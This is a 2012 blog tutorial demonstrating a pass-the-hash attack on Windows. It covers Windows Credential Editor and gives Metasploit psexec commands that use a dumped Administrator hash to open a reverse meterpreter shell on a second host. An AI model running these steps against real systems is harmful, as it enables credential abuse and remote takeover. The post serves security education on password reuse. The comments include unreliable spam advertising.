Wednesday, April 4, 2012

Passing-The-Hash

To me there are few things as elegant as a nice pass-the-hash attack. This should drive home to each of us the risk associated with sharing passwords between systems, especially ones of different security requirements.
With Pass-the-hash, a simple un-cracked hash can be used to compromise other systems using the same account.


How it works:
Once we gain root access to a system, one of the first things we do is grab password hashes, (demonstrated in a previous post), and we typically immediately jump to cracking these hashes. BUT, even an un-cracked hash can be useful. If other systems use the same credentials, we can simply pass the hash along to that system and it will happily accept it and execute code for us.

One method for accomplishing this task is to use the Windows Credential Editor (wce). Written by Hernan Ochoa, it is available from www.ampliasecurity.com/research.html
This tool essentially allows you to edit the memory space of the running LSASS process, replacing your credentials with your victim's username and hash. You can then interact with other systems using any built in windows tool (net use, reg, psexec), and you'll effectively impersonate the victim.
***Newer versions of the tool even allow you to use stolen Kerberos tokens (with the -k and -K options).

Now, there is a simpler method for doing a pass-the-hash attack. Since version 3.1, metasploit has a built in method for it in the psexec exploit. It is VERY EASY, as I'll demonstrate.

We're going to use a hash we've gained from target1 (old vulnerable Windows server), to gain access to target2 (windows XPsp3, fully patched).

First, we dump target1 hashes using the hashdump command, and we copy off Administrator's hash.




Now we start up msfconsole.
The exploit we want is psexec, and for a payload we will use a reverse meterpreter shell, so we issue these commands:
use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
We then set the variables for RHOST (target#2's IP) and LHOST (our IP).
set RHOST "target2 IP"
set LHOST "Our IP"

Now comes the magic. We set the user and password variables. Metasploit will automatically recognize if a hash is used for SMBPass and will use pass-the-hash rather than a password attempt.
set SMBUser Administrator
set SMBPass 73a87bf2afc9ca49b69e407095566351:1c31f...
That's it, run "exploit".




As you can see, this set up the reverse handler, connected to port 445 on target2, and using the hash we supplied it was able to execute our payload, giving us a meterpreter shell.

Because of one unmanaged legacy system, we were able to thoroughly own a completely patched box.

3 comments:

  1. Why is such mechanism even possible? Only explanation that comes to mind is some bizzare implementation of token handling?

    ReplyDelete
  2. Collections from the design labels such as pas cher trx and other beauty are released after every six months.
    With every new launch, a new penny skateboards cheap online technology is developed.
    This had led to making TRX For Sale remain competitive in the International market.
    The entire pas cher trx packaging process is paid into detail to enhance the collections quality and appearance.
    Now everyone can own high-end designer trx france.
    TRX Suspension Training Sale being one of the largest and most prominent fashion company in the world, it has an obligation of beating the standards set by others.
    The fashion world, with a higher concentration on Discount TRX Sale, needs to provide the best packaging services that the modern world has ever seen.
    TRX Suspension Training On Sale plays a major role in creating a brand name that fashion lovers want to identify with.

    ReplyDelete
  3. BlueHost is definitely one of the best website hosting provider for any hosting plans you require.

    ReplyDelete